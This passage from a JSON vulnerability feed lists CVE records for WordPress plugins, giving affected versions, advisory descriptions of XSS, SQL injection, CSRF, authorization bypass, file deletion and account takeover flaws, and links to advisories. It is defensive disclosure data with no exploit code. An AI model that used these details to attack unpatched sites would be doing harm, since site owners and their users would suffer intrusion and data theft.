https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143444\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143444\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9667","slug":"seriously-simple-podcasting","versionImpact":"3.5.0","description":"The Seriously Simple Podcasting plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.5.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4232656-2e97-4888-8dde-14039d8c2f9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4232656-2e97-4888-8dde-14039d8c2f9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seriously-simple-podcasting\\\/trunk\\\/php\\\/classes\\\/handlers\\\/class-options-handler.php#L101\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seriously-simple-podcasting\\\/trunk\\\/php\\\/classes\\\/handlers\\\/class-options-handler.php#L101\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seriously-simple-podcasting\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seriously-simple-podcasting\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181485\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181485\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12253","slug":"simple-e-commerce-shopping-cart","versionImpact":"3.1.2","description":"The Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'save_settings', 'export_csv', and 'simpleecommcart-action' actions in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the plugins settings and retrieve order and log data (which is also accessible to unauthenticated users).","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-e-commerce-shopping-cart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-e-commerce-shopping-cart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6a1956-73aa-4ac3-ae1c-ef5f62bad718?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6a1956-73aa-4ac3-ae1c-ef5f62bad718?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12509","slug":"embed-twine","versionImpact":"0.1.0","description":"The Embed Twine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'embed_twine' shortcode in all versions up to, and including, 0.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-twine\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-twine\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/647f0b46-ac12-445b-9d41-66eba3eb2b1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/647f0b46-ac12-445b-9d41-66eba3eb2b1a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13560","slug":"subscriptions-memberships-for-paypal","versionImpact":"1.1.6","description":"The Subscriptions & Memberships for PayPal plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.6. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246039\\\/subscriptions-memberships-for-paypal\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246039\\\/subscriptions-memberships-for-paypal\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/subscriptions-memberships-for-paypal\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/subscriptions-memberships-for-paypal\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bed7fc8-a961-4141-80a1-9c23a6504fbd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bed7fc8-a961-4141-80a1-9c23a6504fbd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1669","slug":"wpschoolpress","versionImpact":"2.2.16","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to SQL Injection via the 'addNotify' action in all versions up to, and including, 2.2.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with teacher-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks.php#L4304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks.php#L4304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7413d90-aed1-4f78-a17c-bed76efb48f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7413d90-aed1-4f78-a17c-bed76efb48f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32172","slug":"yamaps","versionImpact":"0.6.31","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yuri Baranov YaMaps for WordPress allows Stored XSS. This issue affects YaMaps for WordPress: from n\/a through 0.6.31.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/yamaps\\\/vulnerability\\\/wordpress-yamaps-for-wordpress-plugin-0-6-31-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/yamaps\\\/vulnerability\\\/wordpress-yamaps-for-wordpress-plugin-0-6-31-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6065","slug":"image-resizer-on-the-fly","versionImpact":"1.1","description":"The Image Resizer On The Fly plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete' task in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-resizer-on-the-fly\\\/trunk\\\/image-resizer-on-the-fly.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-resizer-on-the-fly\\\/trunk\\\/image-resizer-on-the-fly.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-resizer-on-the-fly\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/image-resizer-on-the-fly\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14877ff6-e393-41a3-91c1-fe7f477297cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14877ff6-e393-41a3-91c1-fe7f477297cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6717","slug":"b1-accounting","versionImpact":"2.2.56","description":"The B1.lt plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 2.2.56 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b1-accounting\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b1-accounting\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a601d0de-2f09-4f5c-8937-dfa20f1c64ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a601d0de-2f09-4f5c-8937-dfa20f1c64ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0556","slug":"contentstudio","versionImpact":"1.2.5","description":"The ContentStudio plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several functions in versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to obtain the blog metadata (via the function cstu_get_metadata) that includes the plugin's contentstudio_token. Knowing this token allows for other interactions with the plugin such as creating posts in versions prior to 1.2.5, which added other requirements to posting and updating.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2851006%40contentstudio%2Ftrunk&old=2844028%40contentstudio%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2851006%40contentstudio%2Ftrunk&old=2844028%40contentstudio%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/tags\\\/1.2.1\\\/contentstudio-plugin.php#L517\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/tags\\\/1.2.1\\\/contentstudio-plugin.php#L517\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52db8d41-859a-4d68-8b83-3d3af8f1bf64\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52db8d41-859a-4d68-8b83-3d3af8f1bf64\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36700","slug":"kingcomposer","versionImpact":"2.9.3.","description":"The Page Builder: KingComposer plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 2.9.3. This is due to a security nonce being leaked in the '\/wp-admin\/index.php' page. This makes it possible for authenticated attackers to change arbitrary WordPress options, delete arbitrary files\/folders, and inject arbitrary content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bdba04e-df4d-4094-877e-611d69e2e25d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bdba04e-df4d-4094-877e-611d69e2e25d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kingcomposer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kingcomposer\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2320014%40kingcomposer&new=2320014%40kingcomposer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2320014%40kingcomposer&new=2320014%40kingcomposer&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-30485","slug":"avartan-slider-lite","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Solwin Infotech Responsive WordPress Slider \u2013 Avartan Slider Lite plugin <=\u00a01.5.3 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/avartan-slider-lite\\\/wordpress-avartan-slider-lite-plugin-1-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/avartan-slider-lite\\\/wordpress-avartan-slider-lite-plugin-1-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4666","slug":"borderless","versionImpact":"1.5.3","description":"The Borderless \u2013 Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6840637-9b0f-4f3d-bb73-9e4527a5f326?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6840637-9b0f-4f3d-bb73-9e4527a5f326?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/circular-progress-bar.php#L427\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/circular-progress-bar.php#L427\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/progress-bar.php#L412\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/progress-bar.php#L412\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/semi-circular-progress-bar.php#L403\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/semi-circular-progress-bar.php#L403\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/team-member.php#L1101\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/team-member.php#L1101\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/testimonial.php#L905\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/trunk\\\/modules\\\/elementor\\\/widgets\\\/testimonial.php#L905\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/borderless\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/borderless\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085856\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085856\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6310","slug":"advanced-ajax-page-loader","versionImpact":"2.7.7","description":"The Advanced AJAX Page Loader plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 2.7.7. This is due to missing nonce validation in the 'admin_init_AAPL' function and missing file type validation in the 'AAPL_options_validate' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccc75dee-1cf8-4fda-b2a1-f5d68e6c7887?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccc75dee-1cf8-4fda-b2a1-f5d68e6c7887?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ajax-page-loader\\\/tags\\\/2.7.7\\\/advanced-ajax-page-loader.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ajax-page-loader\\\/tags\\\/2.7.7\\\/advanced-ajax-page-loader.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ajax-page-loader\\\/tags\\\/2.7.7\\\/advanced-ajax-page-loader.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ajax-page-loader\\\/tags\\\/2.7.7\\\/advanced-ajax-page-loader.php#L131\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9443","slug":"basticom-framework","versionImpact":"1.5.0","description":"The Basticom Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3dd3dc4b-e936-46a4-8d65-5f4bf05b2374?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3dd3dc4b-e936-46a4-8d65-5f4bf05b2374?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/basticom-framework\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/basticom-framework\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178823\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178823\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12128","slug":"simple-e-commerce-shopping-cart","versionImpact":"3.1.2","description":"The Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018monthly_sales_current_year\u2019 parameter in all versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-e-commerce-shopping-cart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-e-commerce-shopping-cart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7d688af-649c-4858-9c63-b12933d78bc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7d688af-649c-4858-9c63-b12933d78bc2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1668","slug":"wpschoolpress","versionImpact":"2.2.16","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to arbitrary user deletion due to a missing capability check on the wpsp_DeleteUser() function in all versions up to, and including, 2.2.16. This makes it possible for authenticated attackers, with teacher-level access and above, to delete arbitrary user accounts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd5638b6-134d-4386-af40-6ac961a915d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd5638b6-134d-4386-af40-6ac961a915d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32166","slug":"emma-emarketing-plugin","versionImpact":"1.3.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in John Housholder Emma for WordPress allows Stored XSS. This issue affects Emma for WordPress: from n\/a through 1.3.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/emma-emarketing-plugin\\\/vulnerability\\\/wordpress-emma-for-wordpress-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/emma-emarketing-plugin\\\/vulnerability\\\/wordpress-emma-for-wordpress-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0249","slug":"advanced-schedule-posts","versionImpact":"2.1.8","description":"The Advanced Schedule Posts WordPress plugin through 2.1.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7ee3e73-1086-421f-b586-d415a45a6c8e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7ee3e73-1086-421f-b586-d415a45a6c8e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6064","slug":"wp-url-shortener","versionImpact":"1.2","description":"The WP URL Shortener plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on the 'url_shortener_settings' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-url-shortener\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-url-shortener\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/154b3a1a-7246-42de-a555-2c655778d59e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/154b3a1a-7246-42de-a555-2c655778d59e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8898","slug":"ecab-taxi-booking-manager","versionImpact":"1.3.0","description":"The Taxi Booking Manager for Woocommerce | E-cab plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.3.0. This is due to the plugin not properly validating a user's capabilities prior to updating a plugin setting or their identity prior to updating their details like email address. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3343878\\\/ecab-taxi-booking-manager\\\/trunk\\\/inc\\\/MPTBM_Rest_Api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3343878\\\/ecab-taxi-booking-manager\\\/trunk\\\/inc\\\/MPTBM_Rest_Api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ecab-taxi-booking-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ecab-taxi-booking-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd50ac2c-3049-4a44-b7f8-a5f87c42555c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd50ac2c-3049-4a44-b7f8-a5f87c42555c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0555","slug":"quick-restaurant-menu","versionImpact":"2.0.2","description":"The Quick Restaurant Menu plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 2.0.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke those actions intended for administrator use. Actions include menu item creation, update and deletion and other menu management functions. Since the plugin does not verify that a post ID passed to one of its AJAX actions belongs to a menu item, this can lead to arbitrary post deletion\/alteration.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97984c7d-d6ff-480c-acfe-20ab0eb04141\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97984c7d-d6ff-480c-acfe-20ab0eb04141\",\"refsource\":\"MISC\",\"tags\":[]}]"}
